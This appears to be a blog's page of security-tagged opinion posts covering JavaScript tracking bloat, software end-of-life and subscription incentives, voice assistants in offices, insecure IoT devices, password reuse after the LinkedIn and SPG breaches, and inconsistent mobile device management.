Showing all posts tagged security:

The Enemy Within The Browser

At what point do the downsides of Javascript in the browser exceed the upsides? Have we already passed that point?

If you have any concept of security, the idea of downloading code from the Internet and immediately executing it, sight unseen, on your local machine, should give you the screaming heebie-jeebies. A lot of work has gone into sandboxing the browser processes so that Javascript cannot escape the browser itself, and later, the individual web page that it came from. However, this only dealt with the immediate and obvious vulnerability.

These days, the problem with Javascript is that it is used to track users all over the internet and serve them ads for the same products on every site. Quite why this requires 14 MB and 330 HTTP requests for 537 words is not entirely clear.

Actually, no, it is entirely clear: it is because the copro-grammers ("writers of feces") who produce this stuff have no respect for the users. The same utter disrespect underlies the recent bloat in iOS apps:

One Friday I turned off auto-update for apps and let the update queue build up for a week. The results shocked me.
After the first week I had 7.59GB of updates to install, spread across 67 apps – averaging 113MB per app.

Okay, so maybe you say who cares, you only update apps over wifi - but do you only browse on wifi? 14 MB for a few hundred words - that adds up fast.

And what else is that Javascript up to, beyond wasting bytes - both over the air, and in local storage?

How about snaflling data entered into a form, regardless of whether it has been submitted?

Using Javascript, those sites were transmitting information from people as soon as they typed or auto-filled it into an online form. That way, the company would have it even if those people immediately changed their minds and closed the page.

My house, my rules. I look forward to iOS 11, and enabling every blocking feature I can.

I really want media sites to earn money so that they can continue to exist, but they cannot do it at my expense. A banner ad is fine, but 14 MB of Javascript to serve me the same banner ad everywhere - at my expense! - is beyond the pale.

Javascript delenda est.

Incentives Drive Behaviour - Security Is No Exception

Why is security so hard?

Since I no longer work in security, I don’t have to worry about looking like an ambulance-chasing sales person, and I can opine freely about the state of the world.

The main problem with security is the intersection of complexity and openness. In the early days of computers there was a philosophical debate about the appropriate level of security to include in system design. The apex of openness was probably MIT’s Incompatible Time-Sharing System, which did not even oblige users to log on - although it was considered polite to do so.

I will just pause here to imagine that ethos of openness in the context of today’s social media, where the situation is so bad that Twitter felt obliged to change its default user icon because the “egg" had become synonymous with bad behaviour online.

By definition, security and openness are always in opposition. Gene "Spaf" Spafford, who knows a thing or two about security, famously opined that:

The only truly secure system is one that is powered off, cast in a block of concrete and sealed in a lead-lined room with armed guards - and even then I have my doubts.

Obviously, such a highly-secure system is not very usable, so people come up with various compromises based on their personal trade-off between security and usability. The problem is that this attempt to mediate between two opposite impulses adds complexity to the system, which brings its own security vulnerabilities.

Ultimately, IT security is a constant Red Queen’s Race, with operators of IT systems rushing to patch the latest flaws, knowing all the while that more flaws are lurking behind those, or being introduced with new functionality.

Every so often, maintainers of a system will just throw up their hands, declare a system officially unmaintainable, and move to something else. This process is called "End of Life", and is supposed to coincide with users also moving to the new supported platform.

Unfortunately this mass upgrade does not always take place. Many will cite compatibility as a justification, and certainly any IT technician worth their salt knows better than to mess with a running system without a good reason. More often, though, the reason is cost. In a spreadsheet used to calculate the return on different proposed investments, “security" falls under the heading of "risk avoidance"; a nebulous event in the future, that may become less probable if the investment is made.

For those who have not dealt with many finance people, as a rule, they hate this sort of thing. Unless you have good figures for both the probability of the future event and its impact, they are going to be very unhappy with any proposed investment on that basis.

The result is that old software sticks around long after it should have been retired.

As recently as November 2015, it emerged that Paris’ Orly airport was still operating on Windows 3.1 - an operating system that has not been supported since 2001.

The US military still uses 8" floppy disks for its ICBMs:

"This system remains in use because, in short, it still works," Pentagon spokeswoman Lt Col Valerie Henderson told the AFP news agency.

And of course we are still dealing with the fallout from the recent WannaCry ransomware worm, targeting Windows XP - an operating system that has not been supported since 2014. Despite that, it is still the fourth most popular version of Windows (behind Windows 7, Windows 10, and Windows 8.1), with 5.26% share.

Get to the Point!

It’s easy to mock people still using Windows XP, and to say that they got no more than they deserved - but look at that quote from the Pentagon again:

"This system remains in use because, in short, it still works"

Windows XP still works fine for its users. It is still fit for purpose. The IT industry has failed to give those people a meaningful reason to upgrade - and so many don’t, or wait until they buy new hardware and accept whatever comes with the new machine.

Those upgrades do not come nearly as frequently as they used to, though. In the late Nineties and early Oughts, I upgraded my PC every eighteen months or so (as funds permitted), because every upgrade brought huge, meaningful differences. Windows 95 really was a big step up from Windows 3.1. On the Mac side, System 7 really was much better than System 6. Moving from a 486 to a Pentium, or from 68k to PowerPC, was a massive leap. Adding a 3dfx card to your system made an enormous difference.

Vice-versa, a three-year-old computer was an unusable pile of junk. Nerds like me installed Linux on them and ran them side by side with our main computers, but most people had no interest in doing such things.

These days, that’s no longer the case. For everyday web browsing, light email, and word processing, a decade-old computer might well still cut it.

That’s not even to mention institutional use of XP; Britain’s NHS, for instance, was hit quite hard by WannaCry due to their use of Windows XP. For large organisations like the NHS, the direct financial cost of upgrading to a newer version of Windows is a relatively small portion of the overall cost of performing the upgrades, ensuring compatibility of all the required software, and retraining literally hundreds of thousands of staff.

So, users have weak incentives to upgrade to new, presumably more secure, versions of software; got it. Should vendors then be obliged to ship them security patches in perpetuity?

Zeynep Tufekci has argued as much in a piece for the New York Times:

First, companies like Microsoft should discard the idea that they can abandon people using older software. The money they made from these customers hasn’t expired; neither has their responsibility to fix defects.

Unfortunately, it’s not that simple, as Steven Bellovin explains:

There are two costs, a development cost $d and an annual support cost $s for n years after the "warranty" period. Obviously, the company pays $d and recoups it by charging for the product. Who should pay $n·s?

The trouble is that n can be large; the support costs could thus be unbounded.

Can we bound n? Two things are very clear. First, in complex software no one will ever find the last bug. As Fred Brooks noted many years ago, in a complex program patches introduce their own, new bugs. Second, achieving a significant improvement in a product's security generally requires a new architecture and a lot of changed code. It's not a patch, it's a new release. In other words, the most secure current version of Windows XP is better known as Windows 10. You cannot patch your way to security.

Incentives matter, on the vendor side as well as on the user side. Microsoft is not incentivised to do further work on Windows XP, because it has already gathered all the revenue it is ever going to get from that product. From a narrowly financial perspective, Microsoft would prefer that everyone purchase a new license for Windows 10, either standalone or bundled with the purchase of new hardware, and migrate to that platform.

Note that, as Steven Bellovin points out above, this is not just price-gouging; there are legitimate technical reasons to want users to move to the latest version of your product. However, financial incentives do matter, a lot.

This is why if you care about security, you should prefer services that come with a subscription.

If you’re not Paying, you’re the Product

Subscription licensing means that users pay a recurring fee, and in return, vendors provide regular updates, including both new features and fixes such as security patches.

As usual, Ben Thompson has a good primer on the difference between one-off and subscription pricing. His point is that subscriptions are better for both users and vendors because they align incentives correctly.

From a vendor’s perspective, one-off purchases give a hit of revenue up front, but do not really incentivise long-term engagement. It is true that in the professional and enterprise software world, there is also an ongoing maintenance charge, typically on the order of 18-20% per year. However, that is generally accounted for differently from sales revenue, and so does not drive behaviour to nearly the same extent. In this model, individual sales people have to behave like sharks, always in motion, always looking for new customers. Support for existing customers is a much lower priority.

Vice versa, with a subscription there is a strong incentive for vendors to persuade customers to renew their subscription - including by continuing to provide new features and patches. Subscription renewal rates are scrutinised carefully by management (and investors), as any failure to renew may well be symptomatic of problems.

Users are also incentivised to take advantage of the new features, since they have already paid for them. When upgrades are freely available, they are far more likely to be adopted - compare the adoption rate for new MacOS or iOS versions to the rate for Windows (where upgrades cost money) or Android (where upgrades might not be available, short of purchasing new hardware).

This is why Gartner expects that by 2020, more than 80 percent of software vendors will change their business model from traditional license and maintenance to subscription.

At Work - and at Home, Too

One final point: this is not just an abstract discussion for multi-million-euro enterprise license agreements. The exact same incentives apply at home.

A few years ago, I bought a cordless phone that also communicated with Skype. From the phone handset, I could make or answer either a POTS call, or a Skype voice call. This was great - for a while. Unfortunately the hardware vendor never upgraded the phone’s drivers for a new operating system version, which I had upgraded to for various reasons, including improved security.

For a while I soldiered on, using various hacks to keep my Skype phone working, but when the rechargeable batteries died, I threw the whole thing in the recycling bin and got a new, simpler cordless phone that did not depend on complicated software support.

A cordless phone is simple and inexpensive to replace. Imagine that had been my entire Home of the Future IoT setup, with doorbells, locks, alarms, thermostats, fridges, ovens, and who knows what else. “Sorry, your home is no longer supported."1

With a subscription, there is a reasonable expectation that vendors will continue to provide support for the reasonable lifetime of their products (and if they don’t, there is a contract with the force of law behind it).

Whether it’s for your home or your business, if you rely on it, make sure that you pay for a subscription, so that you can be assured of support from the vendor.


  1. Smart home support: “Have you tried closing all the windows and then reopening them one by one?" 

Talk Softly

With the advent of always-on devices that are equipped with sensitive microphones and a permanent connection to the Internet, new security concerns are emerging.

Virtual assistants like Apple’s Siri, Microsoft’s Cortana and Google Now have the potential to make enterprise workers more productive. But do “always listening" assistants pose a serious threat to security and privacy, too?

Betteridge’s Law is in effect here. Sure enough, the second paragraph of the article discloses its sources:

Nineteen percent of organizations are already using intelligent digital assistants, such as Siri and Cortana, for work-related tasks, according to Spiceworks’ October 2016 survey of 566 IT professionals in North America, Europe, the Middle East and Africa.

A whole 566 respondents, you say? From a survey run by a help desk software company? One suspects that the article is over-reaching a bit - and indeed, if we click through to the actual survey, we find this:

Intelligent assistants (e.g., Cortana, Siri, Alexa) used for work-related tasks on company-owned devices had the highest usage rate (19%) of AI technologies

That is a little bit different from what the CSO Online article is claiming. Basically, anyone with a company-issued iPhone who has ever used Siri to create an appointment, set a reminder, or send a message about anything work-related would fall into this category.

Instead, the article makes the leap from that limited claim to extrapolating that people will be bringing their Alexa device to work and connecting it to the corporate network. Leaving aside for a moment the particular vision of hell that is an open-plan office where everyone is talking into the air all the time, what does that mean for the specific recommendations in the article?

  1. Focus on user privacy
  2. Develop a policy
  3. Treat virtual assistant devices like any IoT device
  4. Decide on BYO or company-owned
  5. Plan to protect

These are actually not bad recommendations - but they are so generic as to be useless. Worse, when they do get into specifics, they are almost laughably paranoid:

Assume all devices with a microphone are always listening. Even if the device has a button to turn off the microphone, if it has a power source it’s still possible it could be recording audio.

This is drug-dealer level of paranoia. Worrying that Alexa might be broadcasting your super secret and valuable office conversations does not even make the top ten list of concerns companies should have about introducing such devices into their networks.

The most serious threat you can get from Siri at work is co-workers pranking you if you enable access from the lock screen. In that case, anyone can grab your unattended iPhone and instruct Siri to call you by some ridiculous name. Of course I would never sabotage a colleague’s phone by renaming him “Sweet Cakes". Ahem. Interestingly, it turns out that the hypothetical renaming also extends to the entry in the Contacts…

The real concern is that by focusing on these misguided recommendations, the focus is taken off advice that would actually be useful in the real world. For instance, if you must have IoT devices in the office for some reason, this is good advice:

One way to segment IoT devices from the corporate network is to connect them to a guest Wi-Fi network, which doesn’t provide access to internal network resources.

This recommendation applies to any device that needs Internet access but does not require access to resources on the internal network. This will avoid issues where, by compromising a device (or its enabling cloud service), intruders are able access your internal network in what is known as a “traversal attack". If administrators restrict the device’s access to the network, that will also restrict the amount of damage an intruder can do.

Thinking about access to data is a good idea in general, not just for voice assistants or IoT devices:

Since personal virtual assistants “rely on the cloud to comprehend complex commands, fetch data or assign complex computing tasks to more resources," their use in the enterprise raises issues about data ownership, data retention, data and IP theft, and data privacy enforcement that CISOs and CIOs will need to address.

Any time companies choose to adopt a service that relies on the cloud, their attack surface is not limited to the device itself, but also extends to that back-end service - which is almost certainly outside their visibility and control. Worse, in a BYOD scenario, users may introduce new devices and services to the corporate network that are not designed or configured for compliance with organisations’ security and privacy rules.

Security is important - but let’s focus on getting the basics right, without getting distracted by overly-specific cybersecurity fantasy role-playing game scenarios involving Jason Bourne hacking your Alexa to steal your secrets.

IoT Future: Saved by Obsolescence?

It’s that most magical time of year… no, not Christmas, that’s all over now until next December. No, I mean CES, the annual Consumer Electronics Show in Las Vegas. Where better than Vegas for a million ridiculous dreams to enjoy brief moments of fame, only to fade soon after?

It used to be that the worst thing that could come out of CES was a drawer full of obsolete gadgets. These days, things can get a bit more serious. Pretty much every gadget on display is now wifi-enabled and internet-connected - yes, even the pillows and hairbrushes.

The reason this proliferation of connectivity is a problem is the "blinking twelves" factor, that I have written about before:

Back in the last century, digital clocks with seven-segment displays became ubiquitous, including as part of other items of home electronics such as VCRs. When first plugged in, these would blink "12:00" until the time was set by the user.

Technically-minded people soon noticed that when they visited less technical friends or relatives, all the appliances in the house would still be showing the “blinking twelves" instead of the correct time. The "blinking twelves" rapidly became short-hand for "civilians" not being able to – or not caring to – keep up with the demands of ubiquitous technology.

The problem that we are facing is that technology has already begun to spread beyond the desktop. Even the most technophobic now carry a phone that is “smart" to a greater or lesser degree, and many people treat these devices much like their old VCRs, installing them once and then forgetting about them. However, all of these devices are running 24/7, connected to the public Internet, with little to no management or updates.

Now we are starting to see the impact of that situation. Earlier this year, one of the biggest botnets in history was created from hacked smart CCTV cameras and took down big chunks of the Internet.

That’s just crude weight-of-numbers stuff, though; the situation will get even more… interesting as people figure out how to use all of the data gathered by those Things - and not just the owners of the devices, either. As people introduce always-on internet-connected microphones into their homes, it’s legitimate for police to wonder what evidence those microphones may have overheard. It is no longer totally paranoid to wonder what the eventual impact will be:

Remember that quaint old phrase "in the privacy of your own home". I wonder how often we will be using it in 20 years' time.

What can we do?

Previous scares have shown that there is little point in the digerati getting all excited about these sorts of things. People have enough going on with their lives; it takes laws to force drivers to take care of basic maintenance of their cars, and we are talking about multi-tonne hunks of metal capable of speeds in excess of 100mph. Forget about getting them to update firmware on every single device in their home, several times a year.

Calls for legislation of IoT are in my opinion misguided; previous attempts to apply static legal frameworks to the dynamic environment of the Internet have tended to be ineffective at best, and to backfire at worst.

Ultimately, what will save us is that same blinking twelves nature of consumers. There is a situation right now in San Francisco, where the local public transport system’s display units that should show the time until the next bus or train are giving wildly inaccurate times:

To blame is a glitch that's rendered as many as 40 percent of buses and Muni vehicles "invisible" to the NextMuni system: A bus or light rail train could arrive far sooner than indicated, but the problem, which emerged this week, is not expected to be resolved for several weeks.

Muni management have explained the problem:

NextMuni data is transmitted via AT&T’s wireless cell phone network. As Muni was the first transit agency to adopt the system, the NextMuni infrastructure installed in 2002 only had the capacity to use a 2G wireless network – a now outdated technology which AT&T is deactivating nationwide.

What took down NextMuni - the obsolescence of the 2G network that it relied on - will also be the fix for all the obsolete and insecure IoT devices out there, next time there is a major upgrade in wifi standards. More expert users may proactively upgrade their wifi access points to get better speed and range, but that will not catch most of the blinking twelves people. However, it’s probably safe to assume that most of the Muggles are relying on devices from their internet provider, and when their provider sends them a new device or they change provider, hey presto - all the insecure Things get disconnected from their botnets.

Problem solved?


Image by Arto Marttinen via Unsplash

Security AND Usability

Sure, blame the user

Because there isn’t enough recent security news, everyone is all worked up about the 2012 LinkedIn breach. Okay, it’s somewhat newsworthy because some lowlife is now trying to sell the data. All the security vendors have jumped on the bandwagon1, but in particular lots of people are mocking the fact that people are using common or easily-guessed passwords:

  • 123456

  • linkedin

  • password

  • 123456789

  • 12345678

Now a bot has emerged which attempts to reuse known leaked passwords to log in to sensitive sites such as online banking systems. Predictably, the main response has been mockery, with El Reg opining that If your Netflix password is your banking password, you'll get what you deserve.

This sort of victim-blaming has got to stop. It may be fun in an elitist, look-at-the-lusers sort of way, but it’s not actually advancing the cause of better security.

Obviously the real villains of the piece are the people exploiting those credentials, but those sorts of people are probably going to be with us until the ultimate heat death of the Universe, so blaming them is not a particularly productive exercise. Law enforcement could and should do more to bring the perps to justice, but that can only ever happen after the fact, when it’s too late for the victims.

Among people we can actually expect to influence, I would start with the banks. Given that people are out there trying to break into banking systems, because that's where the money is, and given the potential consequences of a breach, the design of those systems must include more advanced security than a simple username and password pair.

For reasons too complicated and boring to relate, I actually have two bank accounts with different institutions in different countries. Both, however, implement two-factor authentication. One has a challenge-response device that works with my ATM card, while the other requires me to make a call from my registered phone number and enter a one-time code. Any bank not implementing something along those lines in 2016 is negligent with their customers’ security. If your bank does not offer two-factor authentication, you should run, not walk, to the exits.

But what about the (l)users?

Users certainly bear some responsibility for not sharing passwords - but in the real world, there are already far too many services that require me to create an account with a username and a password for no good reason. Log in to comment, log in to review, log in to purchase, log in to make a reservation… No wonder people share passwords between services!

It’s fine to sit in the ivory tower of security policy and blame people for doing this sort of thing, but it’s the reality. At least nowadays most places accept an email address as the user account, so that’s one thing less to remember - without worrying about whether this particular site right here wanted a username of less than eight characters, exactly eight characters, or more than eight characters, or whether somebody had already picked my chosen user name so I made a variant, or whatever.

Passwords themselves are still a problem, though. Logging in via Google, Facebook or Twitter is becoming more common, but there the issue is that I don’t necessarily want to share my social ID with every random website that I need to have a one-time interaction with.

The result is that I reuse passwords for unimportant services all the time. However, all the important ones are unique - including my LinkedIn password, since my old one was caught up in that 2012 breach. Security needs to be done in layers. If someone gets my Random Website password, that won’t get them into my LinkedIn - and if they get my (new) LinkedIn creds, that still won’t get them anywhere with my online banking.

And here’s a pro tip - for all those one-time, "log in to use our wifi"-type deals, just do like my good friend Annie Onymous, who is always happy to share her email address: ann.onymous@myo.biz.

Stay safe out there.


  1. Not that there’s anything wrong with that per se; we all take any opportunity to link our wares to current affairs. What I’m objecting to here is the wrong-headed thinking that is exposed in the rush. 

None

Password to the Ivory Tower

My big focus at work lately is the SecOps gap, the breakdown in communications between IT Security and Operations groups. The problem here is that the infosec group comes up with some policy that is great in theory, but runs into issues when the poor sysadmins try to apply it. Either the policy is too vague, or it is contradictory, or it would break some application that the line of business depends on, or it is simply too cumbersome and time-consuming to implement properly.

download.jpg

At work I talk about this in the context of enterprise IT, but the exact same thing applies in consumer IT. Case in point: there was recently a breach of Starwood's SPG loyalty programme - see Brian Kreb's report. Sure enough, I got an email from SPG entitled "Protect Your Information by Updating Your SPG Password".

imgres.jpg

SPG should be applauded for being so proactive, and the breach does not seem to be due to any gross negligence on their part. The only thing they might have done differently would be to have more aggressive back-off policies for repeated authentication attempts, but let's not forget that this is a generalist site, and one that is probably not used that frequently by most people. Users may legitimately forget their credentials between one login and the next. No, my problem is with Brian Krebs' advice:

far too many people re-use the same passwords at multiple sites that hold either their credit card information or points that can easily be redeemed for cash.

Well yes, this is true, and I'm as guilty as anyone - but on the other hand, there are simply far too many passwords out there! When every website I visit wants me to create a profile and secure that with a password, of course I'm going to reuse those credentials!

The trick is not to reuse credentials on anything valuable. Don't reuse the credentials for your online banking, for instance - those have to be unique. But for every Tom, Dick and Harry who wants a password? They can all get the same one, and that's if I don't simply introduce myself as Ann Onymous, with this handy email account at mailinator.com.

This is why using central login services via Facebook, Twitter or Google is so popular. The problem there is that I don't necessarily want any of that unholy trio tracking my every move, nor do I entirely trust random sites with my Oauth creds, so there's a problem there too. I did like OpenID as a concept, but it's pretty much dead now in practice.

Bottom line

Berating people for poor password security practices won't cut it. We as an industry have to make it easy for people to do the Right Thing, not set up obstacle courses and then point and laugh when people trip over them.


Image by Keith Misner via Unsplash

Security Theatre

There are many things in IT that are received knowledge, things that everyone knows.

One thing that everyone knows is that you have to manage employee's mobile devices to prevent unauthorised access to enterprise systems. My employer's choice of MDM agent is a bit intrusive for my personal tastes, so I opted not to install it on my personal iPad. The iPhone is the company's device, so it's their own choice what they want me to run on it.

Among other things, this agent is required to connect to the company Exchange server from mobile devices. You can't just add an Exchange account and log in with your AD credentials, you need this agent to be in place.

unknown.jpg

But why the focus on mobile devices?

When I upgraded my work and home Macs to Yosemite, I finally turned on the iCloud Keychain. I hadn't checked exactly what was syncing, and was surprised to see work calendar alerts turning up on my home Mac. My personal Mac had just grabbed my AD credentials out of iCloud and logged in to Exchange, without any challenge from the corporate side.

So how is that different from my iPad? Why is a Mac exempt from the roadblock? A Mac is arguably less secure than an iPad if it gets forgotten in a coffee shop or whatever - never mind a Windows machine. Why is "mobile" different? Just because?

Many enterprise IT people seem to lose their minds when it comes to mobile device management. I'm not necessarily arguing for just dropping the requirement, just for a sane evaluation of the risks and the responses that are required.

Dark Security

Brian Krebs reports a spike in payment card fraud following the now-confirmed Home Depot security breach.

This is actually good news.

Wait, what?

Bear with me. There has always been a concern that many security breaches in the cloud are not being reported or disclosed. The fact that there are no other unexplained spikes in card fraud would tend to indicate that there are no huge breaches that have not been reported, frantic stories about billions of stolen accounts notwithstanding.

The day we should really start to worry is when we see spikes in card fraud that are not related to reported breaches.

I'm published!

A piece I wrote on Heartbleed was published in Cloud Computing Intelligence magazine: Once you’ve dealt with Heartbleed, how do you prevent it recurring?.
Summary and lead-in:

You've got rid of Heartbleed, and you're relaxing with a soothing cup of something strong, but how do you know that it's gone for good? Dominic Wellington looks at creating a containment policy for Heartbleed and for any subsequent nasty bug that will stop them from coming back to plague you again.

Feedback welcome!